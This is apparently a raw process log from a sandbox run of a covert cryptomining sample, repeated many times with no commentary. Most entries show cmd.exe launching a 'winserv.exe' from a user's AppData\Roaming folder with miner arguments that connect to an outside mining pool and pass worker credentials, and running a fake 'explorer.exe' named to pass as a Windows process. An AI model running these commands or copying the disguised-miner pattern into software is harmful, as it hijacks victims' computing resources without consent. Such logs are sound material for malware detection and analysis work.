cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
